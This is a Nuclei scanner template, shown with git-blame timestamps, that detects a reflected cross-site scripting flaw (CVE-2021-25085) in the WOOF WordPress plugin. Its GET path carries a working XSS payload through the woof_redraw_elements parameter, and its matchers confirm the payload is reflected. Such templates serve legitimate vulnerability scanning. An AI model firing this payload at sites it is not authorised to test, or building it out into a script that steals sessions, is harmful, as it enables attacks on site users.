nuclei-templates/http/cves/2021/CVE-2021-25085.yaml

54 lines
2.1 KiB
YAML
Raw Permalink Normal View History

2022-06-15 18:18:49 +00:00
id: CVE-2021-25085
info:
name: WOOF WordPress plugin - Cross-Site Scripting
2022-06-15 18:18:49 +00:00
author: Maximus Decimus
severity: medium
2022-06-16 05:25:21 +00:00
description: |
2022-06-21 13:31:04 +00:00
The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
2023-09-06 12:09:01 +00:00
remediation: |
Update to the latest version of the WOOF WordPress plugin, which includes proper input sanitization to mitigate the XSS vulnerability.
2022-06-16 05:25:21 +00:00
reference:
2022-06-15 18:18:49 +00:00
- https://wpscan.com/vulnerability/b7dd81c6-6af1-4976-b928-421ca69bfa90
2022-06-16 05:25:21 +00:00
- https://plugins.trac.wordpress.org/changeset/2648751
- https://nvd.nist.gov/vuln/detail/CVE-2021-25085
- https://github.com/ARPSyndicate/kenzer-templates
2022-06-15 18:18:49 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-25085
2023-07-11 19:49:27 +00:00
cwe-id: CWE-79
2023-08-31 11:46:18 +00:00
epss-score: 0.001
2024-05-31 19:23:20 +00:00
epss-percentile: 0.41295
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:pluginus:woocommerce_products_filter:*:*:*:*:*:wordpress:*:*
2022-06-16 05:36:14 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:09:01 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: pluginus
product: woocommerce_products_filter
2023-09-06 12:09:01 +00:00
framework: wordpress
2024-01-14 09:21:50 +00:00
tags: cve2021,cve,wordpress,wp-plugin,wp,xss,wpscan,pluginus
2022-06-15 18:18:49 +00:00
http:
2022-06-16 05:25:21 +00:00
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=<img%20src=x%20onerror=alert(document.domain)>"
2022-06-15 18:18:49 +00:00
matchers-condition: and
matchers:
2022-06-16 05:25:21 +00:00
- type: word
part: body
words:
- '"additional_fields":["<img src=x onerror=alert(document.domain)>"]}'
- type: word
part: header
words:
- text/html
2022-06-15 18:18:49 +00:00
- type: status
status:
- 200
# digest: 4a0a004730450221008b3cc62097692b48f30dee9a31e29edd84cc6b0210ebef1e269f2f80c2f58ac302204e482d374b7af734d30314feb1693a063427895d8f854955b9dfd687e6d3fc91:922c64590222798bb761d5b6d8e72950